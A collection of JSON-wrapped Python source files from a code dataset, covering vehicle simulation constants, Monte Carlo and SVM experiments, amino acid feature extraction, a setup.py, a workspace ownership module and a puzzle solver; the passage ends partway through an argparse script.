+{"seq_id":"604870620","text":"# Made by: Remmi-Team\n# Refactoring to Python: Pauli Latva-Kokko and Jesper Granat\n\n# Simulation parameters\nSAMPLE_TIME = 0.01\nEND_TIME = 3000\nGRAVITATION_CONSTANT = 9.81\nBEST_INIT_SPEED = 12.9696\nBEST_END_SPEED = 35.688\n\n# FUEL PARAMETERS\nENERGY_DENSITY_MJ = 44.888 # MJ/kg \nENERGY_DENSITY_J = 43.5*10**6\nFUEL_DENSITY = 0.6871 # kg/l\n\n# Vehicle parameters\nVEHICLE_MASS = 81 # Mass of the vehicle with driver\nF_R = (VEHICLE_MASS*9.81)/3 # Radial force acting on each wheel. 50/50 weight distribution is assumed\nDRAG_COEF = 0.11 # Used for calculating the drag of the vehicle.\nFRONT_AREA = 0.35 # Frontal area of the vehicle. Used for calculating the drag of the vehicle.\nRHO = 1.2\nENGINE_TORGUE = 3.15\nENGINE_EFFICIENCY = 0.30\nFRONT_SPROCKET = 141\nREAR_SPROCKET = 18\nDRIVE_RATIO = REAR_SPROCKET / FRONT_SPROCKET\nROLLING_RESISTANCE_COEF = 0.001\nTYRE_DIAMETER = 0.48\nBEARING_DISTANCE = 0.025 # Meters, Distance between the bearings on front wheel hub. Used for bearing force calculation.\n\n# Strategy parameters\n\n\n# Event parameters\nTOTAL_LAPS = 11","sub_path":"Remmi-Team_projektit/Vehicle_performance-simulator/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"499052091","text":"'''\r\nCreated on 22.10.2019\r\n\r\n@author: marc_bussjaeger\r\n'''\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef get_trials_from_experiment_data(experiment_data):\r\n data = experiment_data.split(\",\")[0].split(\"trials = \")[1]\r\n return int(data)\r\n\r\ndef get_estimate_from_experiment_data(experiment_data):\r\n data = experiment_data.split(\"pi is \")[1].split(\"\\nThe\")[0]\r\n return float(data)\r\n\r\ndef get_seconds_from_experiment_data(experiment_data):\r\n data = experiment_data.split(\"took \")[1].split(\" seconds\")[0]\r\n return float(data)\r\n\r\ndef outfile_parser(outfile_path):\r\n # parse the txt into a list of runs that contains experiment dicts\r\n f = open(outfile_path, \"r\")\r\n data = f.read()\r\n f.close()\r\n data = data.replace(\"\\r\",\"\").split(\"finish.\")\r\n \r\n runs = [] # a run is consisting of 9 experiments\r\n run = []\r\n for i, experiment_data in enumerate(data[:-1]):\r\n if i%9==0:\r\n if len(run) is not 0:\r\n runs.append(run)\r\n run = []\r\n experiment = {\r\n \"trials\":get_trials_from_experiment_data(experiment_data),\r\n \"estimate\":get_estimate_from_experiment_data(experiment_data),\r\n \"seconds\":get_seconds_from_experiment_data(experiment_data)\r\n }\r\n run.append(experiment)\r\n runs.append(run)\r\n return runs\r\n\r\ndef accumulate_data(runs):\r\n # return the mean and stddev of the runs\r\n result = runs[0]\r\n for i, result_exp in enumerate(result):\r\n trials = result_exp[\"trials\"]\r\n estimate_list = []\r\n second_list = []\r\n for run in runs:\r\n for exp in run:\r\n if exp['trials']==trials:\r\n estimate_list.append(exp[\"estimate\"])\r\n second_list.append(exp[\"seconds\"])\r\n result[i][\"estimate\"] = np.mean(estimate_list)\r\n result[i][\"estimate_uncert\"] = np.std(estimate_list)\r\n result[i][\"seconds\"] = np.mean(second_list)\r\n result[i][\"seconds_uncert\"] = np.std(second_list)\r\n return result\r\n\r\ndef sort_for_plotting(result):\r\n # sort the accumulated data for plotting\r\n trials = []\r\n estimates = []\r\n estimate_uncerts = []\r\n seconds = []\r\n seconds_uncerts = []\r\n \r\n for exp in result:\r\n trials.append(exp[\"trials\"])\r\n estimates.append(exp[\"estimate\"])\r\n estimate_uncerts.append(exp[\"estimate_uncert\"])\r\n seconds.append(exp[\"seconds\"])\r\n seconds_uncerts.append(exp[\"seconds_uncert\"])\r\n return [trials, estimates, estimate_uncerts, seconds, seconds_uncerts]\r\n\r\n\r\n# get the data\r\nseq_runs = outfile_parser(\"./output_seq\")\r\nmpi_runs_16 = outfile_parser(\"./output_mpi\")\r\nmpi_runs_8 = outfile_parser(\"./output_mpi_8\")\r\nmpi_runs_4 = outfile_parser(\"./output_mpi_4\")\r\n\r\nseq_result = accumulate_data(seq_runs)\r\nmpi_result_16 = accumulate_data(mpi_runs_16)\r\nmpi_result_8 = accumulate_data(mpi_runs_8)\r\nmpi_result_4 = accumulate_data(mpi_runs_4)\r\n\r\nseq_plot_data = sort_for_plotting(seq_result)\r\nmpi_plot_data_16 = sort_for_plotting(mpi_result_16)\r\nmpi_plot_data_8 = sort_for_plotting(mpi_result_8)\r\nmpi_plot_data_4 = sort_for_plotting(mpi_result_4)\r\n\r\n\r\n# plot the estimate data\r\nax = plt.gca()\r\nax.errorbar(seq_plot_data[0], np.array(seq_plot_data[1])-np.pi, yerr=seq_plot_data[2],fmt=\".\", label=\"sequential\")\r\nax.errorbar(mpi_plot_data_16[0], np.array(mpi_plot_data_16[1])-np.pi, yerr=mpi_plot_data_16[2],fmt=\".\", label=\"16 ranks\")\r\nax.errorbar(mpi_plot_data_8[0], np.array(mpi_plot_data_8[1])-np.pi, yerr=mpi_plot_data_8[2],fmt=\".\", label=\"8 ranks\")\r\nax.errorbar(mpi_plot_data_4[0], np.array(mpi_plot_data_4[1])-np.pi, yerr=mpi_plot_data_4[2],fmt=\".\", label=\"4 ranks\")\r\nax.set_xlabel(\"trials\")\r\nax.set_ylabel(r\"$\\pi_{\\mathrm{estimate}}-\\pi$\")\r\nplt.xscale('log')\r\nlegend = ax.legend()\r\nplt.show()\r\n\r\n\r\n# plot the seconds data\r\nax = plt.gca()\r\nax.errorbar(seq_plot_data[0], np.array(seq_plot_data[3]), yerr=seq_plot_data[4],fmt=\".\", label=\"sequential\")\r\nax.errorbar(mpi_plot_data_16[0], np.array(mpi_plot_data_16[3]), yerr=mpi_plot_data_16[4],fmt=\".\", label=\"16 ranks\")\r\nax.errorbar(mpi_plot_data_8[0], np.array(mpi_plot_data_8[3]), yerr=mpi_plot_data_8[4],fmt=\".\", label=\"8 ranks\")\r\nax.errorbar(mpi_plot_data_4[0], np.array(mpi_plot_data_4[3]), yerr=mpi_plot_data_4[4],fmt=\".\", label=\"4 ranks\")\r\nax.set_xlabel(\"trials\")\r\nax.set_ylabel(\"time / s\")\r\nplt.xscale('log')\r\nplt.yscale('log')\r\nlegend = ax.legend()\r\nplt.show()\r\n\r\n\r\n\r\n","sub_path":"proseminar/02/monte_carlo_method/pi_evaluation.py","file_name":"pi_evaluation.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"248705493","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport pandas as pd\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import linear_model, svm\nfrom sklearn.metrics import roc_curve, auc\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef main():\n # Read raw data.\n # https://s3-eu-west-1.amazonaws.com/static.oc-static.com/prod/courses/files/Parcours_data_scientist/entrainez-un-modele-predictif-lineaire/TP_2_datset_mushrooms.csv\n raw_data = pd.read_csv('mushrooms_dataset.csv')\n print('raw_data :\\n', raw_data.head())\n\n # Convert letters to numbers : machine learning algorithms works only on numbers.\n labelencoder=preprocessing.LabelEncoder()\n for col in raw_data.columns:\n raw_data[col] = labelencoder.fit_transform(raw_data[col])\n print('converted raw_data :\\n', raw_data.head())\n\n # Extract data from dataset.\n x = raw_data.iloc[:, 1:23] # Dataset: variables.\n y = raw_data.iloc[:, 0] # Dataset: labels.\n print('x :\\n', x.head())\n print('y :\\n', y.head())\n\n # Scale data to reduce weights.\n # https://openclassrooms.com/fr/courses/4444646-entrainez-un-modele-predictif-lineaire/4507801-reduisez-l-amplitude-des-poids-affectes-a-vos-variables\n std_scale = preprocessing.StandardScaler().fit(x)\n x_scaled = std_scale.transform(x)\n\n # Split data set into training set and testing set.\n # https://openclassrooms.com/fr/courses/4011851-initiez-vous-au-machine-learning/4020631-exploitez-votre-jeu-de-donnees\n x_train, x_test, y_train, y_test = train_test_split(x_scaled, y, test_size=0.3)\n\n # Change the hyperparameters of the model to find the best one, compare different models (with/without regularization).\n models = []\n models.append((linear_model.LogisticRegression(solver = 'liblinear'), 'logistic reg'))\n models.append((svm.LinearSVC(loss='hinge'), 'SVM'))\n _, all_axis = plt.subplots(1, 2)\n for idx_model, model_lbl in enumerate(models):\n # Train a model.\n model, lbl = model_lbl[0], model_lbl[1]\n axis = all_axis.ravel()[idx_model]\n for p in ['l1', 'l2']:\n # Set parameter model.\n model.set_params(penalty=p)\n if p == 'l1' and isinstance(model, svm.LinearSVC):\n continue # Not supported.\n for c in np.logspace(-3, 3, 7): # c coefficient between 10^-3 and 10^3.\n # Set parameter model.\n model.set_params(C=c)\n # Feed the model.\n model.fit(x_train,y_train)\n # Get prediction for positive value\n y_prob = None\n if isinstance(model, linear_model.LogisticRegression):\n y_prob = model.predict_proba(x_test)[:,1]\n if isinstance(model, svm.LinearSVC):\n y_prob = model.predict(x_test)\n # Compute ROC curve.\n # https://openclassrooms.com/fr/courses/4297211-evaluez-les-performances-dun-modele-de-machine-learning/4308261-evaluez-un-algorithme-de-classification-qui-retourne-des-scores\n false_positive_rate, true_positive_rate, thresholds = roc_curve(y_test, y_prob)\n roc_auc = auc(false_positive_rate, true_positive_rate)\n # Plot ROC to identify the best binary classifier.\n axis.set_title('Receiver Operating Characteristic')\n axis.plot(false_positive_rate,true_positive_rate, label='%s - C %08.3f - penalty %s - AUC = %0.5f'%(lbl, c, p, roc_auc))\n axis.set_ylabel('True Positive Rate')\n axis.set_xlabel('False Positive Rate')\n # Plot random binary classifier.\n axis.plot([0, 1], [0, 1], linestyle='--', label='random binary classifier', color='k')\n axis.legend(loc = 'lower right')\n plt.subplots_adjust(left=0.1, bottom=0.1, right=0.9, top=0.9, wspace=0.3, hspace=0.3)\n plt.show()\n\nif __name__ == '__main__':\n # https://openclassrooms.com/fr/courses/4444646-entrainez-un-modele-predictif-lineaire/4507851-tp-entrainez-une-regression-logistique-et-une-svm-lineaire\n main()\n","sub_path":"1.supervised/2.classification/1.linear/mushrooms.py","file_name":"mushrooms.py","file_ext":"py","file_size_in_byte":4123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"158155040","text":"#! /usr/bin/env python\n# -*- mode: python; coding: utf-8 -*-\n# Copyright 2020 the .NET Foundation\n# Distributed under MIT License\n\nimport io\nfrom setuptools import setup\n\nwith io.open('README.md', encoding='utf-8') as f:\n LONG_DESCRIPTION = f.read()\n\nsetup_args = dict(\n name = 'wwt_aligner', # cranko project-name\n version = '0.dev0', # cranko project-version\n description = 'Align RGB images to FITS images using Astrometry.net',\n long_description = LONG_DESCRIPTION,\n long_description_content_type = 'text/markdown',\n url = 'https://github.com/WorldWideTelescope/wwt-aligner',\n license = 'MIT',\n platforms = 'Linux, Mac OS X, Windows',\n\n author = 'AAS WorldWide Telescope Team',\n author_email = 'wwt@aas.org',\n\n classifiers = [\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n ],\n\n packages = [\n 'wwt_aligner',\n 'wwt_aligner.tests',\n ],\n\n entry_points = {\n 'console_scripts': [\n 'wwt-aligner-agent=wwt_aligner.agent_cli:entrypoint',\n ]\n },\n\n install_requires = [\n 'astropy>=4',\n 'pyavm>=0.9',\n 'sep>=1.1',\n 'toasty>=0.4',\n ],\n\n extras_require = {\n 'test': [\n 'pytest',\n 'pytest-cov>=2.6.1',\n ],\n 'docs': [\n 'astropy-sphinx-theme',\n 'numpydoc',\n 'sphinx>=1.6',\n 'sphinx-automodapi',\n ],\n },\n)\n\nif __name__ == '__main__':\n setup(**setup_args)\n","sub_path":"backend/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"635642515","text":"#!/usr/bin/env python3\n\ndef testCase(base):\n n = len(base)\n pos = 0\n buf = ''\n curL = -1\n while curL != 0:\n k = 3 if curL == -1 else curL\n while pos + k > len(buf):\n buf += input()\n if curL == -1:\n curL = int(buf[pos : pos+k], 2)\n else:\n x = int(buf[pos : pos+k], 2)\n if x == (1 << curL) - 1:\n curL = -1\n else:\n print(base[(1 << curL) - (curL + 1) + x], end='')\n pos += k\n print()\n\n\ndef main():\n while True:\n try:\n lin = input()\n except:\n break\n testCase(lin)\n\n\nmain()\n","sub_path":"UVa/UVa_00213.py","file_name":"UVa_00213.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"426835407","text":"import pandas\nimport numpy as np\nfrom sklearn import model_selection\nfrom sklearn import preprocessing\nfrom sklearn import svm\n\n# 1. Loading data\ndata_frame = pandas.read_csv('german.data', sep=' ')\ndata_frame.replace('NA', -1000000, inplace=True)\n\n# 2. Label encoding\nlabels = {\n 'CheckingAccountStatus': ['A11', 'A12', 'A13', 'A14'],\n 'CreditHistory': ['A30', 'A31', 'A32', 'A33', 'A34'],\n 'CreditPurpose': ['A40', 'A41', 'A42', 'A43', 'A44', 'A45', 'A46', 'A47', 'A48', 'A49', 'A410'],\n 'SavingsAccount': ['A61', 'A62', 'A63', 'A64', 'A65'],\n 'EmploymentSince': ['A71', 'A72', 'A73', 'A74', 'A75'],\n 'PersonalStatusSex': ['A91', 'A92', 'A93', 'A94', 'A95'],\n 'OtherDebtors': ['A101', 'A102', 'A103'],\n 'Property': ['A121', 'A122', 'A123', 'A124'],\n 'OtherInstallmentPlans': ['A141', 'A142', 'A143'],\n 'Housing': ['A151', 'A152', 'A153'],\n 'Job': ['A171', 'A172', 'A173', 'A174'],\n 'Phone': ['A191', 'A192'],\n 'ForeignWorker': ['A201', 'A202']\n}\nlabel_encoders = {}\ndata_frame_encoded = pandas.DataFrame()\n\nfor column in data_frame:\n if column in labels:\n label_encoders[column] = preprocessing.LabelEncoder()\n label_encoders[column].fit(labels[column])\n data_frame_encoded[column] = label_encoders[column].transform(\n data_frame[column])\n else:\n data_frame_encoded[column] = data_frame[column]\n\n# 3. Identification of features and labels\nfeatures = np.array(data_frame_encoded.drop(['CreditScore'], 1))\nlabel = np.array(data_frame_encoded['CreditScore'])\n\n# 4. Scaling features\nscaled_features = preprocessing.MinMaxScaler(\n feature_range=(0, 1)).fit_transform(features)\n\n# 5. Splitting training and testing data\nfeatures_train, features_test, label_train, label_test = model_selection.train_test_split(\n scaled_features,\n label,\n test_size=0.2\n)\n\n\n# A. Linear kernel\nclassifier = svm.SVC(kernel=\"linear\")\nclassifier.fit(features_train, label_train)\nprint('Linear kernel score: ', classifier.score(features_test, label_test))\nprint('\\n')\n\n# B. Polynomial kernel of degree 4, C=2, gamma=0.05\nclassifier = svm.SVC(kernel=\"poly\", C=2, degree=4, gamma=0.05)\nclassifier.fit(features_train, label_train)\nprint('Polynomial kernel score (degree 4, C=2, gamma=0.05): ',\n classifier.score(features_test, label_test))\nprint('\\n')\n\n# C. Polynomial kernel of degree 4, C=2, gamma=0.25\nclassifier = svm.SVC(kernel=\"poly\", C=2, degree=4, gamma=0.25)\nclassifier.fit(features_train, label_train)\nprint('Polynomial kernel score (degree 4, C=2, gamma=0.25):',\n classifier.score(features_test, label_test))\nprint('\\n')\n\n# D. Polynomial kernel of degree 4, C=2, gamma=0.5\nclassifier = svm.SVC(kernel=\"poly\", C=2, degree=4, gamma=0.5)\nclassifier.fit(features_train, label_train)\nprint('Polynomial kernel score (degree 4, C=2, gamma=0.5):',\n classifier.score(features_test, label_test))\nprint('\\n')\n\n# E. Sigmoid kernel\nclassifier = svm.SVC(kernel=\"sigmoid\")\nclassifier.fit(features_train, label_train)\nprint('Sigmoid kernel score:', classifier.score(features_test, label_test))\nprint('\\n')\n\n# F. Default kernel with a gamma of 0.15\nclassifier = svm.SVC(kernel=\"rbf\", gamma=0.15)\nclassifier.fit(features_train, label_train)\nprint('Default kernel with a gamma of 0.15 score:',\n classifier.score(features_test, label_test))\n","sub_path":"Chapter13/Activity 09 Support Vector Machine Optimization in scikit-learn/credit_scoring.py","file_name":"credit_scoring.py","file_ext":"py","file_size_in_byte":3322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"624932696","text":"import random\ndef generar_lista(cantidad, inicio, fin):\n lista = []\n for i in range(cantidad):\n valor = random.randint(inicio, fin)\n lista.append(valor)\n return lista\n\ndef obtener_pares(lista):\n res = []\n for i in range(len(lista)):\n if(lista[i] % 2 == 0):\n res.append(lista[i])\n return res\n\nif __name__ == \"__main__\":\n lista = generar_lista(100, 0, 9)\n lista_pares = obtener_pares(lista)\n print(lista)\n print(lista_pares)","sub_path":"s072-guia09/p02.py","file_name":"p02.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"72813425","text":"# adding features to the merged dataframe\nimport numpy as np\nimport pandas as pd\nfrom scipy import stats\n\nfrom Bio.Seq import Seq\nfrom Bio import SeqIO\n\ndata_all = pd.read_csv('/Users/Graceyh/Google Drive/AboutDissertation/Data/ProteinDataAll_correct.csv')\nprint(data_all.head())\n# in the same order of amino acid in AAindex\nfreq_AA =['freq_A','freq_R','freq_N','freq_D','freq_C','freq_Q','freq_E','freq_G','freq_H','freq_I','freq_L','freq_K','freq_M','freq_F','freq_P','freq_S','freq_T','frea_W''freq_Y','freq_V']\nprint(len(freq_AA))\nperc_AA =['perc_A','perc_R','perc_N','perc_D','perc_C','perc_Q','perc_E','perc_G','perc_H','perc_I','perc_L','perc_K','perc_ M','perc_F','perc_P','perc_S','perc_T','perc_W','perc_Y','perc_V']\nAA =['A','R','N','D','C','Q','E','G','H','I','L','K','M','F','P','S','T','W','Y','V']\n\ndef calAAFreq(seq,AA):\n # seq: vector of sequence objects in biopython\n # AA: abreviation of amino acid (string: \"A\")\n freq_AA = seq.map(lambda x: x.count(AA))\n return freq_AA\n\ndef calAAPerc(seq,AA):\n # seq: vector of sequence objects in biopython\n # AA: abreviation of amino acid (string: \"A\")\n # return the amino acid composition of sequences in percentage * 100\n\n # seq_length: corresponding length vector of the sequences\n seq_length = seq.map(lambda x: len(x))\n perc_AA = calAAFreq(seq,AA).divide(seq_length)* 100\n return perc_AA\n\n# # add frequencies of amino acid as features to the dataframe\n# for i in range(0,19):\n# data_all[freq_AA[i]] = calAAFreq(data_all['sequence'],AA[i])\n\n# add composition of amino acid as features to the dataframe\nfor j in range(0,20):\n data_all[perc_AA[j]] = calAAPerc(data_all['sequence'],AA[j])\n\nprint(data_all.head())\nprint(data_all.columns)\ndata_all.to_csv(\"/Users/Graceyh/Desktop/ABDataPerc_correct.csv\",index=False)\n# data_all.to_csv(\"/Users/Graceyh/Desktop/ABDataFreqcorrect.csv\",index=False)\n\n#-----------------------------------------------------------------------------#\n# # build a dataframe that contain only the frequencies of each amino acid and output it to csv for later calculation\n# data_Abridged.drop(data_Abridged.columns[[0,1,2,3]],axis=1,inplace=True)\n# data_Abridged.to_csv(\"/Users/Graceyh/Google Drive/AboutDissertation/Data/ProteinDataAll(Abridged_AA_correct).csv\")\n# #\n# store a dataframe of amino acid percentage in each sequence for later calculation\ndf_AA = data_all.copy()\ndf_AA.drop(df_AA.columns[[0,1,2,3]],axis=1,inplace=True)\ndf_AA.to_csv(\"/Users/Graceyh/Google Drive/AboutDissertation/Data/ProteinAAperc_correct.csv\",index=False)\nprint(df_AA.columns)\n\n#-----------------------------------------------------------------------------#\n\n# use properties of amino acid as features\n\n# Hydrophobicity index (Argos et al., 1982), Eur. J. Biochem. 128, 565-575 (1982)\nhydrophobicity = [0.61, 0.60, 0.06, 0.46, 1.07, 0.0, 0.47, 0.07, 0.61, 2.22,1.53, 1.15, 1.18, 2.02, 1.95, 0.05, 0.05, 2.65, 1.88, 1.32]\n# Size (Dawson, 1972), In \"The Biochemical Genetics of Man\" (Brock, D.J.H. and Mayo, O., eds.),Academic Press, New York, pp.1-38 (1972)\nsize = [2.5, 7.5, 5.0, 2.5, 3.0, 6.0, 5.0, 0.5, 6.0, 5.5, 5.5, 7.0, 6.0, 6.5, 5.5, 3.0, 5.0, 7.0, 7.0, 5.0]\n# Average volumes of residues (Pontius et al., 1996), J. Mol. Biol 264, 121-136 (1996) (Disulfide bonded cysteine, 102.4)\nvolume = [91.5, 196.1, 138.3, 135.2, 114.4, 156.4, 154.6, 67.5, 163.2, 162.6, 163.4, 162.5, 165.9, 198.8, 123.4, 102.0, 126.0, 209.8, 237.2, 138.4]\n\n# Net charge (Klein et al., 1984), Biochim. Biophys. Acta 787, 221-226 (1984)\nnetCharge = [0, 1, 0, -1, 0, -1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0]\n\n# Average flexibility indices (Bhaskaran-Ponnuswamy, 1988),Int. J. Peptide Protein Res. 32, 241-255 (1988)\navgFlexibility = [0.357, 0.529, 0.463, 0.511, 0.346, 0.493, 0.497, 0.544, 0.323, 0.462, 0.365, 0.466, 0.295, 0.314, 0.509, 0.507, 0.444, 0.305, 0.420, 0.386]\n\n# solvent accessibility, Information value for accessibility; average fraction 35% (Biou et al., 1988), Protein Engineering 2, 185-191 (1988)\nsolvAccess = [16, -70, -74, -78, 168, -73, -106, -13, 50, 151,145, -141, 124, 189, -20, -70, -38, 145, 53, 123]\n\n# Proportion of residues 95% buried (Chothia, 1976), The nature of the accessible and buried surfaces in proteins, J. Mol. Biol. 105, 1-14 (1976)\nburiedProportion= [0.38, 0.01, 0.12, 0.15, 0.45, 0.07, 0.18, 0.36, 0.17, 0.60, 0.45, 0.03, 0.40, 0.50, 0.18, 0.22, 0.23, 0.27, 0.15, 0.54]\n\n# Ratio of buried and accessible molar fractions (Janin, 1979), Surface and inside volumes in globular proteins, Nature 277, 491-492 (1979)\nburiedRatio = [1.7, 0.1, 0.4, 0.4, 4.6, 0.3, 0.3, 1.8, 0.8, 3.1, 2.4, 0.05, 1.9, 2.2, 0.6, 0.8, 0.7, 1.6, 0.5, 2.9]\n# Solvation free energy (Eisenberg-McLachlan, 1986), Solvation energy in protein folding and binding, Nature 319, 199-203 (1986)\nsolvationFreeEnergy = [0.67, -2.1, -0.6, -1.2, 0.38, -0.22, -0.76,0, 0.64, 1.9, 1.9, -0.57, 2.4, 2.3, 1.2, 0.01, 0.52, 2.6, 1.6, 1.5]\n\n# calculate entropy of protein sequence to denote the sequence complexity\ndef entropy(row):\n return stats.entropy(row, base = 2)\n\n#-----------------------------------------------------------------------------#\n# add average hydrophobicity and sum of size as features\ndata_all['avg_hydrophobicity'] = df_AA.dot(hydrophobicity).divide(data_all['length'])\ndata_all['sum_size'] = df_AA.dot(size)\ndata_all['sum_volume'] = df_AA.dot(volume)\ndata_all['sum_netCharge'] = df_AA.dot(netCharge)\ndata_all['avg_Flexibility'] = df_AA.dot(avgFlexibility).divide(data_all['length'])\ndata_all['avg_solvAccess'] = df_AA.dot(solvAccess).divide(data_all['length'])\n# buriedProportion is the same as buriedRatio, so keep only one of them\ndata_all['avg_buriedProportion'] = df_AA.dot(buriedProportion).divide(data_all['length'])\n# data_all['avg_buriedRatio'] = df_AA.dot(buriedRatio).divide(data_all['length'])\ndata_all['solvationFreeEnergy'] =df_AA.dot(solvationFreeEnergy)\n\ndata_all['entropy']=df_AA.apply(lambda row: entropy(row),axis = 1)\nprint(data_all['entropy'])\n\nprint(\"----------------------------------------------------------------------\")\nprint(data_all.head())\nprint(data_all.columns)\ndata_all.to_csv(\"/Users/Graceyh/Desktop/AbData(allfeature)).csv\",index = False)\n","sub_path":"addFeatures.py","file_name":"addFeatures.py","file_ext":"py","file_size_in_byte":6174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"438272499","text":"import warnings\n\nfrom. import interfaces\n\ndef discoverBackends():\n\timport pkg_resources\n\tpts = list(pkg_resources.iter_entry_points(group=\"file_2_package\"))\n\treturn dict(( (b.name, b) for b in pts ))\n\ndiscoveredBackends = discoverBackends()\n\ndef selectBackend(name:str):\n\tb = discoveredBackends[name]\n\tinit = b.load()\n\tcls = init(interfaces)\n\tcls.ID = name\n\treturn cls\n","sub_path":"File2Package/BackendsDiscoverer.py","file_name":"BackendsDiscoverer.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"62722446","text":"from . import user as userActions\nimport app.dbModels as dbModels\nimport app.errors as errors\nfrom datetime import datetime\nimport sqlalchemy.exc as SQLErrors\n\n# importing related models from database\nUserAccount = dbModels.UserAccount\nUserProfile = dbModels.UserProfile\nWorkspace = dbModels.Workspace\nOwnership = dbModels.Ownership\n\ndef getAllWorkspaces(db):\n workspaces = Workspace.query.all()\n return workspaces\n\ndef getAllOwnerships(db):\n ownerships = Ownership.query.all()\n return ownerships\n\ndef getOwnershipsOfWorkspace(db, workspaceID, role = 'ALL'):\n if not workspaceID:\n raise errors.DBExceptions.MissingCredentialFields\n\n ownerships = []\n if role == 'ALL':\n ownerships = Ownership.query.filter_by(workspaceID = workspaceID).all()\n else:\n ownerships = Ownership.query.filter_by(workspaceID = workspaceID, role = role).all()\n\n return ownerships\n\ndef getUserWorkspaces(db, userID):\n userActions.getUserByID(db, userID)\n ownerships = Ownership.query.filter_by(userID = userID).all()\n\n return [ownership.workspace for ownership in ownerships]\n\ndef getWorkspaceByID(db, userID, workspaceID):\n if not workspaceID:\n raise errors.DBExceptions.MissingCredentialFields\n\n userActions.getUserByID(db, userID)\n ownership = Ownership.query.filter_by(userID = userID, workspaceID = workspaceID).first()\n \n if ownership:\n return ownership.workspace\n \n raise errors.DBExceptions.NotAuthorized\n \ndef checkWorkspaceOwnership(db, ownerID, workspaceID):\n if not (ownerID and workspaceID):\n raise errors.DBExceptions.MissingCredentialFields\n \n workspace = Workspace.query.filter_by(ownerID = ownerID, id = workspaceID).first()\n if not workspace:\n raise errors.DBExceptions.NotAuthorized\n \n return workspace\n\ndef createWorkspace(db, userID, filename):\n if not (db and userID and filename):\n raise errors.DBExceptions.MissingCredentialFields\n\n user = userActions.getUserByID(db, userID)\n\n try:\n newWorkspace = Workspace(filename = filename, ownerID = userID, owner = user.profile)\n\n db.session.add(newWorkspace)\n db.session.flush()\n\n newOwnership = Ownership(role = 'OWNER', userID = userID, user = user.profile, workspaceID = newWorkspace.id, workspace = newWorkspace)\n db.session.add(newOwnership)\n db.session.commit()\n\n return newWorkspace\n except SQLErrors.IntegrityError:\n raise errors.DBExceptions.UniqueRoleForWorkspace\n\ndef createOwnership(db, ownerID, workspaceID, targetUserID):\n if not (targetUserID and ownerID and workspaceID):\n raise errors.DBExceptions.MissingCredentialFields\n\n workspace = checkWorkspaceOwnership(db, ownerID, workspaceID)\n targetUser = UserAccount.query.filter_by(profile_id = targetUserID).first()\n if not targetUser:\n raise errors.DBExceptions.RecordNotExisted\n\n try:\n newOwnership = Ownership(userID = targetUserID, user = targetUser.profile, workspaceID = workspace.id, workspace = workspace)\n \n db.session.add(newOwnership)\n db.session.commit()\n\n return True\n except SQLErrors.IntegrityError:\n raise errors.DBExceptions.UniqueRoleForWorkspace\n\ndef updateWorksapceFilename(db, ownerID, workspaceID, newFilename):\n if not (ownerID and workspaceID and newFilename):\n raise errors.DBExceptions.MissingCredentialFields\n\n workspace = checkWorkspaceOwnership(db, ownerID, workspaceID)\n workspace.filename = newFilename\n db.session.commit()\n\n return True\n\ndef swapWorksapceOwnership(db, ownerID, workspaceID, userID):\n if not (ownerID and userID and workspaceID):\n raise errors.DBExceptions.MissingCredentialFields\n\n targetWorkspace = checkWorkspaceOwnership(db, ownerID, workspaceID)\n\n # assign the ownership\n targetUser = userActions.getUserByID(db, userID)\n targetWorkspace.ownerID = userID\n targetWorkspace.owner = targetUser\n \n # swap roles\n ownerOwnership = Ownership.query.filter_by(userID = ownerID, workspaceID = workspaceID)\n userOwnership = Ownership.query.filter_by(userID = userID, workspaceID = workspaceID)\n\n tempRole = ownerOwnership.role\n ownerOwnership.role = userOwnership.role\n userOwnership.role = tempRole\n\n db.session.commit()\n return True\n\ndef deleteWorkspace(db, ownerID, workspaceID):\n if not (ownerID and workspaceID):\n raise errors.DBExceptions.MissingCredentialFields\n \n workspace = checkWorkspaceOwnership(db, ownerID, workspaceID)\n db.session.delete(workspace)\n db.session.commit()\n\n return True\n\ndef deleteOwnership(db, userID, workspaceID):\n if not (userID and workspaceID):\n raise errors.DBExceptions.MissingCredentialFields\n\n ownership = Ownership.query.filter_by(workspaceID = workspaceID, userID = userID).first()\n if not ownership:\n raise errors.DBExceptions.UniqueRoleForWorkspace\n \n if ownership.role == \"OWNER\":\n return deleteWorkspace(db, userID, workspaceID)\n else:\n db.session.delete(ownership)\n db.session.commit()\n return True","sub_path":"Server/app/actions/workspace.py","file_name":"workspace.py","file_ext":"py","file_size_in_byte":4855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"206079083","text":"import re\r\nimport sys\r\nimport argparse\r\n\r\n# Open file objects\r\nparser = argparse.ArgumentParser( description='Process replacement of thread names' )\r\nparser.add_argument( '-t', '--thread', metavar='threadFile', required=True, help='Thread file from KWD output log' )\r\nparser.add_argument( '-m', '--monitor', metavar='monitorReport', required=True, help='Report file from Performance 